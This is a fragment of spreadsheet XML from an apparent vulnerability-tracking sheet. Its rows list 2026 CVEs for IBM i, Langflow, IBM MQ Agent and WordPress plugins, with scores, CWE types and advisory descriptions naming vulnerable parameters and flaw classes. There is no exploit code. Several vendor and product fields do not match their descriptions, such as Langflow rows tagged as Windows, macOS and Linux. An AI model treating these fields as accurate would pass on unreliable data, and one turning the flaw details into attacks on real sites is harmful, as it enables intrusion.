      <c r="D3824" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3824" s="5" t="inlineStr"/>
      <c r="F3824" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3824" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H3824" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="I3824" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3824" s="5" t="inlineStr"/>
      <c r="K3824" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L3824" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a remote authenticated attacker to cause a denial of service due to a stack-based buffer overflow.</t>
        </is>
      </c>
      <c r="M3824" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17259</t>
        </is>
      </c>
    </row>
    <row r="3825">
      <c r="A3825" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3825" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17273</t>
        </is>
      </c>
      <c r="C3825" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3825" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3825" s="5" t="inlineStr"/>
      <c r="F3825" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3825" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H3825" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="I3825" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3825" s="5" t="inlineStr"/>
      <c r="K3825" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L3825" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a remote authenticated attacker to cause a denial of service due to a NULL pointer dereference.</t>
        </is>
      </c>
      <c r="M3825" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17273</t>
        </is>
      </c>
    </row>
    <row r="3826">
      <c r="A3826" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3826" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17443</t>
        </is>
      </c>
      <c r="C3826" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3826" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3826" s="5" t="inlineStr"/>
      <c r="F3826" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3826" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H3826" s="5" t="inlineStr">
        <is>
          <t>ibm:app_connect_enterprise, ibm:integration_bus_for_z\/os</t>
        </is>
      </c>
      <c r="I3826" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3826" s="5" t="inlineStr"/>
      <c r="K3826" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="L3826" s="5" t="inlineStr">
        <is>
          <t>IBM App Connect Enterprise 13.0.1.0 through 13.0.8.1, and 12.0.1.0 through 12.0.12.28 and IBM Integration Bus for z/OS 10.1.0.0 through 10.1.0.7 could allow a remote authenticated attacker to obtain sensitive information due to an XML external entity (XXE) injection flaw.</t>
        </is>
      </c>
      <c r="M3826" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17443</t>
        </is>
      </c>
    </row>
    <row r="3827">
      <c r="A3827" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3827" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17444</t>
        </is>
      </c>
      <c r="C3827" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3827" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3827" s="5" t="inlineStr"/>
      <c r="F3827" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3827" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H3827" s="5" t="inlineStr">
        <is>
          <t>ibm:app_connect_enterprise, ibm:integration_bus_for_z\/os</t>
        </is>
      </c>
      <c r="I3827" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3827" s="5" t="inlineStr"/>
      <c r="K3827" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="L3827" s="5" t="inlineStr">
        <is>
          <t>IBM App Connect Enterprise 13.0.1.0 through 13.0.8.1, and 12.0.1.0 through 12.0.12.28 and IBM Integration Bus for z/OS 10.1.0.0 through 10.1.0.7 could allow a remote authenticated attacker to obtain sensitive information due to an XML external entity (XXE) injection.</t>
        </is>
      </c>
      <c r="M3827" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17444</t>
        </is>
      </c>
    </row>
    <row r="3828">
      <c r="A3828" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3828" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17509</t>
        </is>
      </c>
      <c r="C3828" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3828" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3828" s="5" t="inlineStr"/>
      <c r="F3828" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3828" s="5" t="inlineStr"/>
      <c r="H3828" s="5" t="inlineStr"/>
      <c r="I3828" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3828" s="5" t="inlineStr"/>
      <c r="K3828" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L3828" s="5" t="inlineStr">
        <is>
          <t>The WPML Multilingual CMS plugin for WordPress is vulnerable to time-based SQL Injection via the ‘elementIds’ parameter in all versions up to, and including, 4.9.5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This vulnerability is exploitable due to an authorization bypass where the registered authorization callback fails to execute, allowing any authenticated user regardless of role to access administrative translation functionalities.</t>
        </is>
      </c>
      <c r="M3828" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17509</t>
        </is>
      </c>
    </row>
    <row r="3829">
      <c r="A3829" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3829" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17622</t>
        </is>
      </c>
      <c r="C3829" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3829" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3829" s="5" t="inlineStr"/>
      <c r="F3829" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3829" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows, ibm</t>
        </is>
      </c>
      <c r="H3829" s="5" t="inlineStr">
        <is>
          <t>apple:macos, langflow:langflow, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="I3829" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3829" s="5" t="inlineStr"/>
      <c r="K3829" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3829" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.10.2 could allow a remote authenticated attacker to obtain sensitive information due to improper limitation of a pathname to a restricted directory.</t>
        </is>
      </c>
      <c r="M3829" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17622</t>
        </is>
      </c>
    </row>
    <row r="3830">
      <c r="A3830" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3830" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17631</t>
        </is>
      </c>
      <c r="C3830" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3830" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3830" s="5" t="inlineStr"/>
      <c r="F3830" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3830" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows, ibm</t>
        </is>
      </c>
      <c r="H3830" s="5" t="inlineStr">
        <is>
          <t>apple:macos, langflow:langflow, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="I3830" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3830" s="5" t="inlineStr"/>
      <c r="K3830" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L3830" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.10.2 could allow a remote authenticated attacker to obtain sensitive information due to a server-side request forgery (SSRF) vulnerability.</t>
        </is>
      </c>
      <c r="M3830" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17631</t>
        </is>
      </c>
    </row>
    <row r="3831">
      <c r="A3831" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3831" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18021</t>
        </is>
      </c>
      <c r="C3831" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3831" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3831" s="5" t="inlineStr"/>
      <c r="F3831" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3831" s="5" t="inlineStr"/>
      <c r="H3831" s="5" t="inlineStr"/>
      <c r="I3831" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3831" s="5" t="inlineStr"/>
      <c r="K3831" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L3831" s="5" t="inlineStr">
        <is>
          <t>The The Beaver Builder Page Builder – Drag and Drop Website Builder plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 2.10.3.1. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.</t>
        </is>
      </c>
      <c r="M3831" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18021</t>
        </is>
      </c>
    </row>
    <row r="3832">
      <c r="A3832" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3832" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18076</t>
        </is>
      </c>
      <c r="C3832" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3832" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3832" s="5" t="inlineStr"/>
      <c r="F3832" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3832" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H3832" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="I3832" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3832" s="5" t="inlineStr"/>
      <c r="K3832" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="L3832" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a remote authenticated attacker to cause a denial of service due to a memory leak.</t>
        </is>
      </c>
      <c r="M3832" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18076</t>
        </is>
      </c>
    </row>
    <row r="3833">
      <c r="A3833" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3833" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18078</t>
        </is>
      </c>
      <c r="C3833" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3833" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3833" s="5" t="inlineStr"/>
      <c r="F3833" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3833" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H3833" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="I3833" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3833" s="5" t="inlineStr"/>
      <c r="K3833" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L3833" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a remote authenticated attacker to cause a denial of service due to an integer overflow.</t>
        </is>
      </c>
      <c r="M3833" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18078</t>
        </is>
      </c>
    </row>
    <row r="3834">
      <c r="A3834" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3834" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18744</t>
        </is>
      </c>
      <c r="C3834" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3834" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3834" s="5" t="inlineStr"/>
      <c r="F3834" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3834" s="5" t="inlineStr"/>
      <c r="H3834" s="5" t="inlineStr"/>
      <c r="I3834" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J3834" s="5" t="inlineStr"/>
      <c r="K3834" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L3834" s="5" t="inlineStr">
        <is>
          <t>Any authenticated case participant can fetch any OTHER vendor's CaseStatement + per-vul CaseMemberStatus by supplying that member's id — test_func only checks _is_my_case, not ownership of kwargs['member']. Bypasses share_status; leaks embargoed vendor affected/not-affected + statement text cross-tenant.</t>
        </is>
      </c>
      <c r="M3834" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18744</t>
        </is>
      </c>
    </row>
    <row r="3835">
      <c r="A3835" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3835" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18887</t>
        </is>
      </c>
      <c r="C3835" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3835" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3835" s="5" t="inlineStr"/>
      <c r="F3835" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3835" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H3835" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="I3835" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3835" s="5" t="inlineStr"/>
      <c r="K3835" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L3835" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow an authenticated attacker to obtain sensitive information in PASE. An attacker could exploit this vulnerability to access information about process they shouldn't be permitted to access.</t>
        </is>
      </c>
      <c r="M3835" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18887</t>
        </is>
      </c>
    </row>
    <row r="3836">
      <c r="A3836" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3836" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19127</t>
        </is>
      </c>
      <c r="C3836" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3836" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3836" s="5" t="inlineStr"/>
      <c r="F3836" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3836" s="5" t="inlineStr"/>
      <c r="H3836" s="5" t="inlineStr"/>
      <c r="I3836" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J3836" s="5" t="inlineStr"/>
      <c r="K3836" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="L3836" s="5" t="inlineStr">
        <is>
          <t>An issue in the billing and license activation subsystem allows remote attackers to bypass payment authorization workflows. By exploiting insufficient cryptographic validation or lack of server-side state verification on promotional/lifetime-deal (LTD) redemption codes, an unauthenticated attacker can forge valid redemption tokens or replay existing single-use codes to activate permanent, tier-highest paid subscriptions without a financial transaction.</t>
        </is>
      </c>
      <c r="M3836" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19127</t>
        </is>
      </c>
    </row>
    <row r="3837">
      <c r="A3837" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3837" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19299</t>
        </is>
      </c>
      <c r="C3837" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3837" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3837" s="5" t="inlineStr"/>
      <c r="F3837" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3837" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows, ibm</t>
        </is>
      </c>
      <c r="H3837" s="5" t="inlineStr">
        <is>
          <t>apple:macos, langflow:langflow, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="I3837" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3837" s="5" t="inlineStr"/>
      <c r="K3837" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3837" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.2 could allow a remote authenticated attacker to obtain sensitive information due to path traversal.</t>
        </is>
      </c>
      <c r="M3837" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19299</t>
        </is>
      </c>
    </row>
    <row r="3838">
      <c r="A3838" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3838" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19301</t>
        </is>
      </c>
      <c r="C3838" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3838" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3838" s="5" t="inlineStr"/>
      <c r="F3838" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3838" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows, ibm</t>
        </is>
      </c>
      <c r="H3838" s="5" t="inlineStr">
        <is>
          <t>apple:macos, langflow:langflow, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="I3838" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3838" s="5" t="inlineStr"/>
      <c r="K3838" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L3838" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.2 could allow a remote authenticated attacker to obtain sensitive information due to server-side request forgery.</t>
        </is>
      </c>
      <c r="M3838" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19301</t>
        </is>
      </c>
    </row>
    <row r="3839">
      <c r="A3839" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3839" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19302</t>
        </is>
      </c>
      <c r="C3839" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3839" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3839" s="5" t="inlineStr"/>
      <c r="F3839" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3839" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows, ibm</t>
        </is>
      </c>
      <c r="H3839" s="5" t="inlineStr">
        <is>
          <t>apple:macos, langflow:langflow, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="I3839" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3839" s="5" t="inlineStr"/>
      <c r="K3839" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3839" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.2 could allow a remote authenticated attacker to obtain sensitive information due to improper validation of symbolic links.</t>
        </is>
      </c>
      <c r="M3839" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19302</t>
        </is>
      </c>
    </row>
    <row r="3840">
      <c r="A3840" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3840" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19645</t>
        </is>
      </c>
      <c r="C3840" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3840" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3840" s="5" t="inlineStr"/>
      <c r="F3840" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3840" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H3840" s="5" t="inlineStr"/>
      <c r="I3840" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3840" s="5" t="inlineStr"/>
      <c r="K3840" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L3840" s="5" t="inlineStr">
        <is>
          <t>IBM MQ Agent CD: v1.0.0, v1.0.1, v2.0.0, v2.0.1 An authenticated user with a valid session cookie can submit arbitrarily large or computationallyexpensive requests that cause the LLM agent workers to be held for extended periods — rangingfrom tens of seconds to over ten minutes per request. When multiple such requests are sentconcurrently, the agent worker pool becomes exhausted, causing all other IBM MQ Console users toexperience degraded performance or complete unavailability of the AI Agent feature.</t>
        </is>
      </c>
      <c r="M3840" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19645</t>
        </is>
      </c>
    </row>
    <row r="3841">
      <c r="A3841" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3841" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19778</t>
        </is>
      </c>
      <c r="C3841" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3841" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3841" s="5" t="inlineStr"/>
      <c r="F3841" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3841" s="5" t="inlineStr"/>
      <c r="H3841" s="5" t="inlineStr"/>
      <c r="I3841" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3841" s="5" t="inlineStr"/>
      <c r="K3841" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L3841" s="5" t="inlineStr">
        <is>
          <t>The WPMR Google Feed Manager for WooCommerce – Sell on Google Merchant Center &amp; Shopping plugin for WordPress is vulnerable to time-based SQL Injection via the 'feed' parameter in all versions up to, and including, 2.23.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.</t>
        </is>
      </c>
      <c r="M3841" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19778</t>
        </is>
      </c>
    </row>
    <row r="3842">
      <c r="A3842" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3842" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19840</t>
        </is>
      </c>
      <c r="C3842" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3842" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3842" s="5" t="inlineStr"/>
      <c r="F3842" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3842" s="5" t="inlineStr"/>
      <c r="H3842" s="5" t="inlineStr"/>
      <c r="I3842" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3842" s="5" t="inlineStr"/>
      <c r="K3842" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L3842" s="5" t="inlineStr">
        <is>
          <t>The Notiqoo  WordPress plugin before 1.4.14 does not have capability checks on several of its AJAX actions and builds the name of the option to write from user input, allowing users with a role as low as contributor to modify arbitrary WordPress options, which can be used to deactivate Notiqoo  WordPress plugin before 1.4.14 and to lock every administrator out of the site.</t>
        </is>
      </c>
      <c r="M3842" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19840</t>
        </is>
      </c>
    </row>
    <row r="3843">
      <c r="A3843" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3843" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19855</t>
        </is>
      </c>
      <c r="C3843" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3843" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3843" s="5" t="inlineStr"/>
      <c r="F3843" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3843" s="5" t="inlineStr"/>
      <c r="H3843" s="5" t="inlineStr"/>
      <c r="I3843" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3843" s="5" t="inlineStr"/>
      <c r="K3843" s="5" t="inlineStr">
        <is>
          <t>CWE-74</t>
        </is>
      </c>
      <c r="L3843" s="5" t="inlineStr">
        <is>
          <t>The CleanTalk WordPress plugin before 6.87 does not prevent unauthenticated, user-supplied comment content from being passed to WordPress's shortcode engine, allowing any visitor to have arbitrary shortcodes registered on the site executed server-side and rendered to every subsequent visitor of the page.</t>
        </is>
      </c>
      <c r="M3843" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19855</t>
        </is>
      </c>
    </row>
    <row r="3844">
      <c r="A3844" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3844" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19859</t>
        </is>
      </c>
      <c r="C3844" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3844" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3844" s="5" t="inlineStr"/>
      <c r="F3844" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3844" s="5" t="inlineStr"/>
      <c r="H3844" s="5" t="inlineStr"/>
      <c r="I3844" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J3844" s="5" t="inlineStr"/>
      <c r="K3844" s="5" t="inlineStr">
        <is>
          <t>CWE-74</t>
        </is>
      </c>
      <c r="L3844" s="5" t="inlineStr">
        <is>
          <t>The JetFormBuilder WordPress plugin before 3.6.5.2 does not sanitize a request parameter before rendering it as message content, allowing unauthenticated users to execute arbitrary shortcodes registered on the site on any page displaying a form. Escaping is applied to that content before a later shortcode-expansion pass rather than after it, so the escaping can be bypassed.</t>
        </is>
      </c>
      <c r="M3844" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19859</t>
        </is>
      </c>
    </row>
    <row r="3845">
      <c r="A3845" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3845" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-2340</t>
        </is>
      </c>
      <c r="C3845" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3845" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3845" s="5" t="inlineStr"/>
      <c r="F3845" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G3845" s="5" t="inlineStr"/>
      <c r="H3845" s="5" t="inlineStr">
        <is>
          <t>redhat:enterprise_linux, redhat:openshift_container_platform, samba:samba</t>
        </is>
      </c>
      <c r="I3845" s="5" t="inlineStr">
        <is>
          <t>2026-05-27</t>
        </is>
      </c>
      <c r="J3845" s="5" t="inlineStr"/>
      <c r="K3845" s="5" t="inlineStr">
        <is>
          <t>CWE-280</t>
